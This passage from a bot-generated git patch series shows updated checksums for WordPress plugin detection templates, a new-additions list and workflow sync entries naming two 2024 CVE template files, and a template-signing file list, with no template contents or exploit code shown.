+http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:60c280d5be6e49fffbfab7200707c23bfa3dece9 -http/technologies/wordpress/plugins/pixelyoursite.yaml:ed0a5178723a0a85ed9716a5649055be686751f6 -http/technologies/wordpress/plugins/polylang.yaml:f6e02d2fb147f1b9963029ad7ffe96ad2650bc93 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:7dc5dfd98f1bde113b692412f4af313da5251127 -http/technologies/wordpress/plugins/post-smtp.yaml:6d93919c58b2e3dee03d899376aab2bcd8baac41 -http/technologies/wordpress/plugins/post-types-order.yaml:2d27cfa9888a22cd6ffe66ff5f583557fca61abd -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:e8c01eef432cd24e2749084283af316dc28ac5ba -http/technologies/wordpress/plugins/pretty-link.yaml:354f82693663b695409ad6818e4fb3fb3855e092 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:945e2f023327edd149872c69620c9282130e455c -http/technologies/wordpress/plugins/really-simple-ssl.yaml:11ea54633ed07033f39fcbadcc6b4b3fada9f305 -http/technologies/wordpress/plugins/redirection.yaml:25f126a42f960128dd1a5eff060af47ffd7c0709 -http/technologies/wordpress/plugins/redux-framework.yaml:4a7208ba52fbe184c6c9bfbffca6defff692fd96 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:55320cce6436a954be6196ac1e76bea29a2ee341 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:72ac8c718d6a1b9fc66f8d1ac383f386d771e146 -http/technologies/wordpress/plugins/safe-svg.yaml:e3eb213e8137f1f9ae46a34e89679fe2556b2963 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:667e85958f7d0b3ce48048f52eadd03d4dff796e -http/technologies/wordpress/plugins/sg-cachepress.yaml:a7543fbee6302e36c65ddb108947af26400981de -http/technologies/wordpress/plugins/sg-security.yaml:346456fb3b0650091eab05eab42083ac7647b560 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:615f0eb84728db3347fe3ab8f499ed8ce6ca87a6 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:e6085994dee501392cd30de05b97fcc3af44be33 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:0401395b4025234f5e62e671e9f3e0592e87e192 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:a92bd14bd0d15be833044687ff05f9381be3dbd4 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:6008f805e213058849d14758e7859b43189104a9 -http/technologies/wordpress/plugins/smart-slider-3.yaml:28e86fb2a5ac8522639af081936904387fc26171 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:047cf044da8e62b268913ca9813bf043250a62fa +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:06de9c122fa554b42f0ca037ebd6e8d09d8e0b40 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:b44b811ed551c93192adb402eaf0996237f619e3 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:efae4bcd8e2ea2407df63b6f2997eb46d7446f2a +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:146a000d5930a01a334f0c7de5d337595597e143 -http/technologies/wordpress/plugins/tablepress.yaml:57897cc0c528ae6f116db88d3697230cf06af284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:f06cce59f43624ff8007987aefde9694d1d7ae8c -http/technologies/wordpress/plugins/templately.yaml:38b49b158f7316346e1fb93247cb282b89a1ad76 -http/technologies/wordpress/plugins/the-events-calendar.yaml:e268e774b2980aec8954afbc8029d81b7f3e0d2e +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:e9a304f927614e555476bc63ad91e35bfae2a65e -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:ff142bcff4788af9f84916abc14882821e6e0e8e -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:315997cd4590f267a751d741a8aa944f17a34198 -http/technologies/wordpress/plugins/under-construction-page.yaml:8f12af61b6ebe8ba4b6aa25300b4f6b2affb80ba +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:c92b5fed6ba2dc3131c58e5ef0e2f5a0b7620314 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:832843c7d41f57397dc7f90b4109b4f7cbfa1485 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:d1b0a2fda6022c97d3893b60c8b817b932a8f5a2 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:72c94a603f2cd1f07259667891226f4d9e1a4dae -http/technologies/wordpress/plugins/webp-express.yaml:d8d32f5540050d9a585bc1f233e5ed9128b0ff11 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:7e79cc8f288bbb962ae40a736d23da208cd07004 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:47ab2b53d98a7bbdd82f10292280bba7a75ead6e -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:11b2c149376287dedf03068c3c8d8dc6ae97c036 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:09c064387a3e4dfcc155bc16696832c315e2f1a9 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:49e9b456676304bcfa2360a10b46155aeaaf2962 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:87535d895542fb0937c5581de17e2e6f87e7e82e -http/technologies/wordpress/plugins/woocommerce-payments.yaml:166b776102cb50a57dedf846d7f0c80f21283302 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b8976bdc66535fc7506b2bc1a8c12367201cc0c5 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:e4dd6b5a94b69e2f3b91b78e54cd4bf5fbc18319 -http/technologies/wordpress/plugins/woocommerce-services.yaml:f74c76dbaa5d7e81993f7f6f66eff774f7e59116 -http/technologies/wordpress/plugins/woocommerce.yaml:0107e9eb210285f8124e4771cbefea60c14259db -http/technologies/wordpress/plugins/wordfence.yaml:ad29c0ae5e770c0190df5e5a1e85f762b78a13ca -http/technologies/wordpress/plugins/wordpress-importer.yaml:d2ba0aee3970210d713d46b197fdbeaf302419c9 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d63f1f4f19e9ede4be07b61ba54fe903be9a8224 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:db16e0f80182f86673940a83429667f7f84377a9 -http/technologies/wordpress/plugins/wp-crontrol.yaml:7a623bf74f173d0c6a1d323d0bcf7d40236a652a -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d3694b4612fe7a671a02efc77147d907d1d19f8c -http/technologies/wordpress/plugins/wp-file-manager.yaml:923e607afbf441cb7cbbfd12d4c60df32e36163e -http/technologies/wordpress/plugins/wp-google-maps.yaml:87389b08bf5ee02c77f84b80584d58b407cfed9b -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:45d567c972cf96d2d9e4f78c3975144fb0e8de2a -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:49f95af0bbcccbc5bd6d471f216b730f7515bf4d -http/technologies/wordpress/plugins/wp-migrate-db.yaml:b0083249a97670f91811f92397ac7c1a0c10f1b3 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:3a2f8d83d16946046ac2fd0599fdcb7189087f69 -http/technologies/wordpress/plugins/wp-optimize.yaml:98e16005a7b7c4b86ca183a9f64aeba68aff19f6 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:812a0cb9687bcdad573e64c9f2a88649fe60d361 -http/technologies/wordpress/plugins/wp-reset.yaml:c18f4a125e9bdf0c78a9ae1d9799d4b66f129c40 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:074d82a2ff8fe19a78dd41854288590699b0ac84 -http/technologies/wordpress/plugins/wp-rollback.yaml:871a52b2eadff49c8ad59861f7bf7e00c92ffa64 -http/technologies/wordpress/plugins/wp-seopress.yaml:17132c727d82625cfe0a7de9428b6b8cfbf6495c -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a6572bb74c0cc5ff972cf6993f9b065b4026a243 -http/technologies/wordpress/plugins/wp-smushit.yaml:28dddce7646a0257d55bd4249322162617b2a941 -http/technologies/wordpress/plugins/wp-statistics.yaml:1e8a5f577d6228b2c0d919fc48eb24710e1f967d -http/technologies/wordpress/plugins/wp-super-cache.yaml:23361ff2818bc2bb57d876e8b0e036d56d3bd67b +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:1d7df0209c7416f17a4c2fb18512740c5fa79aed -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:75282bef1d2b9947f13b705305073d354b9d5ed9 -http/technologies/wordpress/plugins/wpforms-lite.yaml:40219485097daf6125086695e25207efc7cd5fc6 -http/technologies/wordpress/plugins/wps-hide-login.yaml:8a8645f2e14ccfcc376acaabb45e52423f91408b -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:30deebcc14271fd4755d8b12c65d05943c7681c9 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c25c45221b2255963c8985ea182d32bb03feea1c +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8944,7 +8945,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c4c02153a862f5a0ad7d7fded440d7777ad04b75 +templates-checksum.txt:f4d6016b47852c40cb6b55e31f0a464cc9db177a vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 3c2b99609e40298e124e5664b6d58cbd9aa7ca4b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 31 Jul 2024 09:41:09 +0000 Subject: [PATCH 1780/1841] Auto Generated New Template Addition List [Wed Jul 31 09:41:09 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 3c182014ce..6e6d1b9901 100644 --- a/.new-additions +++ b/.new-additions @@ -1,8 +1,10 @@ http/cves/2022/CVE-2022-27043.yaml http/cves/2023/CVE-2023-44393.yaml http/cves/2024/CVE-2024-39903.yaml +http/cves/2024/CVE-2024-39907.yaml http/cves/2024/CVE-2024-6205.yaml http/cves/2024/CVE-2024-6366.yaml +http/cves/2024/CVE-2024-6396.yaml http/cves/2024/CVE-2024-6922.yaml http/cves/2024/CVE-2024-7188.yaml http/misconfiguration/deployment-interface-exposed.yaml From b09b364de5224ab39e3961bb186d2adfe329f9c8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 31 Jul 2024 09:42:01 +0000 Subject: [PATCH 1781/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 92ceb647e0..a12fe4daf4 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,8 +6,10 @@ on: - 'http/cves/2022/CVE-2022-27043.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' + - 'http/cves/2024/CVE-2024-39907.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' - 'http/cves/2024/CVE-2024-6366.yaml' + - 'http/cves/2024/CVE-2024-6396.yaml' - 'http/cves/2024/CVE-2024-6922.yaml' - 'http/cves/2024/CVE-2024-7188.yaml' - 'http/misconfiguration/deployment-interface-exposed.yaml' From ae956892b1fcf474ac5218a1ee59f7eae6ef4af5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 31 Jul 2024 09:42:28 +0000 Subject: [PATCH 1782/1841] Auto Template Signing [Wed Jul 31 09:42:28 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6396.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + 